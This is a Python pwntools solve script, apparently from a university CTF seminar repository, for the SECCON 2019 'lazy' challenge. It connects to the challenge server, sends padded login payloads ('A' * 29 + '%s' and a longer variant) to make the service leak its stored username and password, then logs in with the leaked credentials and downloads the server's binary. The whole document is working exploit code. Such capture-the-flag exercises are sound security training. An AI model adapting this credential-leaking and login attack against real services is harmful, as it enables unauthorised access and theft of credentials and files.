]> git.somenet.org - pub/jan/ctf-seminar.git/blob - writeups/hah/seccond19/lazy_solve.py
Wrong date
[pub/jan/ctf-seminar.git] / writeups / hah / seccond19 / lazy_solve.py
1 #!/usr/bin/python
2
3 from pwn import *
4
5 username = "_H4CK3R_"
6 password = "3XPL01717"
7
8 leak_password_payload = "A" * 29 + "%s"
9 leak_username_payload = "A" * 29 + "B" * 32 + "%s"
10
11 def get_connection():
12     r = remote("lazy.chal.seccon.jp", 33333)
13     #r = process("./source")
14     return r
15
16 def leak_with_payload(payload):
17     r = get_connection()
18     r.recvline_startswith("3: Exit")
19     r.sendline("2") # Login
20     r.sendline(payload)
21     r.recvline_startswith("username :")
22     leak = r.recvline(False)
23     r.close()
24     return(leak)
25
26 def get_loggedin_connection(username, password):
27     r = get_connection()
28     r.recvline_startswith("3: Exit")
29     r.sendline("2") # Login
30     r.sendline(username)
31     r.sendline(password)
32     return r
33
34 def retrieve_login_source():
35     r = get_connection()
36     file = open("login_source.c", "w")
37     r.sendline("1") # Public contents
38     r.sendline("login_source.c")
39     r.recvuntil("bytes")
40     file.write(r.recvn(1201))
41     file.close()
42     r.close()
43
44 def retrieve_binary(username, password):
45     r = get_loggedin_connection(username, password)
46     file = open("lazy", "wb")
47     r.sendline("4") # Manage
48     r.sendline("lazy") # Remote filename
49     r.recvuntil("bytes")
50     file.write(r.recvn(14216))
51     file.close()
52     r.close()
53
54 print("### Step 1: Retrieving provided partial source code")
55 retrieve_login_source()
56
57 print("### Step 2: Leak username and password")
58 leaked_username = leak_with_payload(leak_username_payload)
59 leaked_password = leak_with_payload(leak_password_payload)
60 print("Leaked username: {}".format(leaked_username))
61 print("Leaked password: {}".format(leaked_password))
62
63 print("### Step 3: Login and download binary")
64 retrieve_binary(leaked_username, leaked_password)